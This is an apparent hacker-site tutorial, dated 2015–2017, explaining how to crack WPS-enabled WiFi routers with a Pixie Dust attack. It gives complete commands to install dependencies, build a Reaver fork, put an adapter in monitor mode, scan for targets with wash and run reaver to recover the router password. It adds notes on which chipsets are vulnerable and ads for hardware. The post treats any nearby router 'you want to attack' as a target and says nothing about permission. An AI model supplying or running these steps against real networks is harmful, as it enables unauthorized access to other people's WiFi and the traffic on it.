How to Hack WiFi Using a WPS Pixie Dust Attack

Jun 25, 2015 11:12 AM
Jul 22, 2017 05:54 AM

Long time reader, first time 'How To' poster. This tutorial has been highly requested. Here are the steps to perform a Pixie Dust attack to crack a WiFi password that has WPS enabled.

Please note, this attack is very specific in nature. I've had a lot of success running this attack against Ralink and Realtek chipsets, and very spotty success against Broadcom chipsets. This might not work against all routers, but it is definitely worth trying before using a brute force attack against WPS.

Let's Begin!!!

Step 1: Download All Dependencies

It's important to download all dependencies from the repository before proceeding with the attack. Kali Linux includes some of these, but if you're using another flavor of Linux, it may not. So let's go through all of them.

  1. First, type into the terminal: apt-get update
  2. Then: apt-get install build-essential
  3. apt-get install libpcap-dev
  4. apt-get install sqlite3
  5. apt-get install libsqlite3-dev
  6. apt-get install pixiewps

I like to do each download individually as I've had issues in the past trying to download all at once.

Step 2: Clone the GitHub Repository

This attack works by using a fork of Reaver. We'll need to download, compile, and install the fork. Let's begin:

git clone https://github.com/t6x/reaver-wps-fork-t6x

Step 3: Installation

From your pwd, type...

  1. cd reaver-wps-fork-t6x/
  2. cd src/
  3. ./configure
  4. make
  5. make install

Or use 'sudo make install' if you're not logged in as 'root'.

Step 4: Monitor Mode

Put your interface into monitor mode using 'airmon-ng start {wireless interface}'.


Check out our list of Kali compatible wireless networks.

For this to work, we'll need to use a compatible wireless network adapter. Check out our 2017 list of Kali Linux and Backtrack compatible wireless network adapters in the link above, or you can grab our most popular adapter for beginners here.


Step 5: Find a Target

The easiest way to find a target with WPS enabled is to run:

'wash -i {monitor-interface}'

Gather the BSSID and channel # for the router you want to attack. Make sure you have a strong signal before attempting this attack.


Step 6: Launch the Attack

Once you have all the information, simply type in the following command:

reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f


Step 7: Ta-Da!

There's the password! Again, this attack won't work against all routers, but it is definitely more effective than a brute force attack (Pixie Dust: maximum 30 minutes vs Brute Force: minutes to DAYS!)


If you're looking for a cheap, handy platform to get started working with the pixie dust attack, check out our Kali Linux Raspberry Pi build using the $35 Raspberry Pi.


Get started on the Kali Pi.

That's all for now!
